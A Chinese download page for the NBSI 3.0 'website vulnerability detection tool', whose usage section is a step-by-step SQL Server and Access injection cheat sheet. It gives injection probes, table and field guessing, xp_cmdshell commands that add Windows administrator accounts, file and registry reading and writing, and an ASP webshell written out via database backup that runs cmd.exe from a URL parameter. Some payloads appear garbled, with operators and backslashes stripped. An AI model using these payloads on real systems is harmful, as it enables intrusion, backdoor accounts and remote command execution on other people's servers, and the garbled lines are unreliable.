海平线软件 / 下载安全软件,信赖海平线
海平线软件

您的位置: 首页 > 电脑软件 > 安全相关 > 网络安全 > nbsi网站漏洞检测工具下载v3.0 官方版

nbsi 3.0纯净版是一款专业的网站漏洞检测工具,使用该软件用户可以快速的检测网站漏洞,检测结果精准,速度快,可以快速的提高该行业人员办公效率,欢迎来绿色资源网下载!

nbsi 3.0纯净版简介

本工具功能非常强大,希望同学们用于正途,别去做一些偷鸡摸狗的令人可耻的事情,由VB语言编写的网站漏洞检测工具的名称,ASP注入漏洞检测工具,特别在sql server注入检测方面有极高的准确率。

nbsi官方版使用说明

1.判断是否有注入

;and 1=1

;and 1=2

2.初步判断是否是mssql

;and user0

3.判断数据库系统

;and (select count(*) from sysobjects)0 mssql

;and (select count(*) from msysobjects)0 access

4.注入参数是字符

'and [查询条件] and ''='

5.搜索时没过滤参数的

'and [查询条件] and '%25'='

6.猜数据库

;and (Select Count(*) from [数据库名])0

7.猜字段

;and (Select Count(字段名) from 数据库名)0

8.猜字段中记录长度

;and (select top 1 len(字段名) from 数据库名)0

9.(1)猜字段的ascii值(access)

;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)0

(2)猜字段的ascii值(mssql)

;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)0

10.测试权限结构(mssql)

;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--

;and 1=(SELECT IS_SRVROLEMEMBER('serveRadmin'));--

;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--

;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--

;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--

;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--

;and 1=(SELECT IS_MEMBER('db_owner'));--

11.添加mssql和系统的帐户

;exec master.dbo.sp_addlogin username;--

;exec master.dbo.sp_password null,

username,password;--

;exec master.dbo.sp_addsrvrolemember sysadmin

username;--

;exec master.dbo.xp_cmdshell 'net user username

password /workstations:* /times:all

/passwordchg:yes /passwordreq:yes /active:yes /add'

;--

;exec master.dbo.xp_cmdshell 'net user username

password /add';--

;exec master.dbo.xp_cmdshell 'net localgroup

administrators username /add';--

12.(1)遍历目录

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree 'c:'

;and (select top 1 paths from dirs)0

;and (select top 1 paths from dirs where paths not

in('上步得到的paths')))

(2)遍历目录

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器

;insert into temp(id) exec master.dbo.xp_subdirs 'c:';-- 获得子目录列表

;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:';-- 获得所有子目录的目录树结构

;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:webindex.asp';-- 查看文件的内容

13.mssql中的存储过程

xp_regenumvalues 注册表根键, 子键

;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE',

'SOFTWAREMicrosoftWindowsCurrentVersionRun' 以多个记录集方式返回所有键值

xp_regread 根键,子键,键值名

;exec xp_regread 'HKEY_LOCAL_MACHINE',

'SOFTWAREMicrosoftWindowsCurrentVersion',

'CommonFilesDir' 返回制定键的值

xp_regwrite 根键,子键, 值名, 值类型, 值

值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型

;exec xp_regwrite 'HKEY_LOCAL_MACHINE',

'SOFTWAREMicrosoftWindowsCurrentVersion',

'TestValueName','reg_sz','hello' 写入注册表

xp_regdeletevalue 根键,子键,值名

exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE',

'SOFTWAREMicrosoftWindowsCurrentVersion',

'TestValueName' 删除某个值

xp_regdeletekey 'HKEY_LOCAL_MACHINE',

'SOFTWAREMicrosoftWindowsCurrentVersionTestkey' 删除键,包括该键下所有值

14.mssql的backup创建webshell

use model

create table cmd(str image);

insert into cmd(str) values ('% Dim oScript %');

backup database model to disk='c:l.asp';

15.mssql内置函数

;and (select @@version)0 获得Windows的版本号

;and user_name()='dbo' 判断当前系统的连接用户是不是sa

;and (select user_name())0 爆当前系统的连接用户

;and (select db_name())0 得到当前连接的数据库

16.简洁的webshell

use model

create table cmd(str image);

insert into cmd(str) values ('%=server.createobject("wscript.shell").exec("cmd.exe /c "request("c")).stdout.readall%');

backup database model to disk='g:wwwtestl.asp';

请求的时候,像这样子用:

http://ip/l.asp?c=dir

解压密码:

标签: nbsi网站漏洞检测工具 sql nbsi

人气软件

更多>单机游戏合集

在这里,您可以随时脱离网络依赖,畅享完整剧情与高自由度玩法——从3A大作到小众神作,随时开启一段专属于您的沉浸式游戏旅程。 查看 >>

nbsi网站漏洞检测工具下载v3.0 官方版

下载地址在右侧
相关文章
] 奇未安全os最新版下载官方版 蓝蛇端口扫描器下载v1.0.0.135 官方版 路由侠下载v0.4.1.0 官方版 好家长电脑控制软件下载v2017 最新版 nbsi网站漏洞检测工具下载v3.0 官方版 猎豹安全大师软件下载v5.2.5.1022 pc版 norman malware cleaner(恶意软件清理)下载v4.3.0.1 英文绿色免费版 WorkWin局域网管理监控软件下载v10.0.32 特别绿色版 防色专家(NoPorn)下载v4.0 专业版 avg internet security2016(avg杀毒软件)下载v16.0.7134 中文绿色版 360加固助手下载v1.4.1.0 官方版 F黑Fluxay流光下载5.0 最新中文 宽带卫士精简版(中国电信宽带卫士安全产品)下载v1.6.091021 中文官方安装版 沃通数字证书工具下载v16.09.03 官方版 金山网盾(主页安全浏览)下载v3.6.5 正式版 金山网镖2009下载v2009.9.3.182 官方版 巨盾拦拦下载v1.2.10.329 最新版 家庭网络卫士下载v1.1.0.1066 官方版 乐游安全助手下载v2.6 官方版 内蒙古地税ca数字证书海泰版驱动下载v5.0 官方版 mcafee siteadvisor下载v3.2.7.0 官方安装版 山东ca证书助手下载v1.0 官方版 宽带卫士下载v2.0 官方版 安徽地税CA证书驱动下载v2.0.2101.2501 官方版 防色墙反黄监控器下载v1.81 简体中文绿色免费版 火绒安全实验室下载v2.5.0.75 官方版 大华pss监控软件(大华pss客户端)下载v4.06 中文安装版_附说明书 宝钢CA证书下载v1.0 官方版 TimeOn云杀毒下载v8.0 官方版 okshare最新版(局域网共享一键修复)下载v19.3.13 官方版 云锁软件下载v2.2.131 官方版 浙江地税签名控件下载v7.0.0.1 官方版 河北ca数字证书助手v5下载v6.8.0.0 官方版 破壳web极速扫描器(网站目录与文件扫描)下载v2.4 内部版 360安全密码生成器下载V1.0 绿色免费版 网易将军令电脑版(动态密码保护器)下载v4.1.0 官方pc版 河南省地税证书小精灵下载v2.3.1 最新版 蒲公英访问者下载v4.7.0.34862 最新版 保卫者防骗(商家版)下载v1.0.6 绿色官方版 hscan汉化版下载v1.20 绿色中文版 绿盟报告提取端口工具下载v1.0 绿色免费版 MsMicrosoft isa server 2006 64位系统客户端下载32/64位 简体中文标准版 反黄之盾大众版(净网卫士)下载v1.2.0.0 官方pc版 趋势科技网络安全专家2017下载v17.5 官方版 飘零网络验证系统下载v7.5 金盾版 进程防火墙软件下载v15.2 免费版 小红伞网络安全大师下载v9.0 安装版 湖北地税CA证书驱动下载v1.0.0.0 官方版 hips简单测试工具下载V1.0 绿色免费版 云安网站卫士下载v4.0 官方安装版
回顶部 去下载

关于本站|下载帮助|下载声明|软件发布|联系我们

Copyright © 2026 www.hpxrj.com.All rights reserved.

备案号琼ICP备2026002670号-1

11111